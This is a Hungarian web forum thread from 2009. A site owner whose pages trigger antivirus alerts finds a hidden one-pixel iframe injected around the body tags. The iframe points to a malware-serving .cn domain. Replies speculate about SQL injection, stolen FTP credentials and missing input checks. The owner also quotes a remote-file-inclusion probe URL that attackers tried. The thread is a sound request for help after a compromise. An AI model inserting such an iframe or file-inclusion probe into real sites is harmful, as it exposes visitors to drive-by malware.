Iframe hack történt az oldalamon

Iframe hack történt az oldalamon
2009-04-14T07:49:43+02:00
2009-07-13T19:32:39+02:00
2022-10-28T14:21:38+02:00
  • Igazából nem tudom, hogy most mit értünk bemenő adatok alatt. A linken keresztül próbálnak sokan játszani, teszem azt mindig vannak ilyenek, hogy

    ilyen az eredeti link: http://popiracing.hu/index.php?lokal=hir&hirid=89

    és próbálnak ilyet: http://popiracing.hu/index.php?lokal=http://blablabla

    de ezek eddig nem vezettek eredményre. A "sima" felhasználóknak az oldalon egy helyen van lehetőségük a fájlfeltöltésre, azaz képfeltöltésre, de ott a feltöltött fájlt megvizsgálom, hogy kép-e, van-e magassága és szélessége stb. és csak azután történik meg az elhelyezése.

    De sajnos ugyanez az Iframe-es betörés ezzel egy időben megtörtént egy másik oldalaomon is, amely nem rendelkezik képfeltötlési joggal a többi emberkének.
    Mutasd a teljes hozzászólást!
  • Én az sql betörést reállisabnak találom. Könyebb és gyorsabb.
    Mutasd a teljes hozzászólást!
  • Talán az FTP-t nyomták fel?


    Nagy valószínűséggel igen. És (lehet) a saját gépeden kezdték.
    Nagytakarítás, jelszóváltoztatás, kényelmi funkciók (jelszó megjegyzése) kikapcsolása előnyös lehet.
    Mutasd a teljes hozzászólást!
  • Mielőtt bármi okos ötlet jönne valakitől is töröld le azt az átkozott bejegyzést az oldalról. Nálam is jelzett a vírusírtó.

    A bemenő adatokat ellenőrzöd php-val? A freeweben is sokszor van betörés de ellenőrzés melett egy idő után elmaradnak.
    Mutasd a teljes hozzászólást!
  • Sziasztok!

    Segítséget szeretnék kérni! Van egy oldalam, a popiracing.hu. Saját motorral ment eddig szépen gond nélkül, de az oldal letöltésekor, véletlenszerűen a Nod, AVG és egyéb víruskeresők jeleznek, hogy tórjai van az oldalon. Benéztem a forrásba, és a <body> tag előtt és a </body> tag után a következő tűnt fel:


    <iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden"></iframe>

    Ezt lenne itt a bibi. Sajnos még nem vagyok jártas a hackerek elleni védelemben, mert eddig még soha nem hackelték az oldalaimat. Olvastam exploitokról és sql injection-ról, de nem tudom eldönteni, hogy ez minek minősül. Az oldalam használ mysql-t és az egyes blokkjait az oldalnak, sql-ből tölti be. A másik, hogy, hogyan tudtak írni az index.php-ba? Talán jogosultsági bajok vannak magával az index fájllal? Bármi jó tanácsot szívesen fogadok!

    A szerveren amúgy egy debian fut, apache2 és php5. Talán az FTP-t nyomták fel?

    Előre is köszönöm!
    Mutasd a teljes hozzászólást!
Tetszett amit olvastál? Szeretnél a jövőben is értesülni a hasonló érdekességekről?
abcd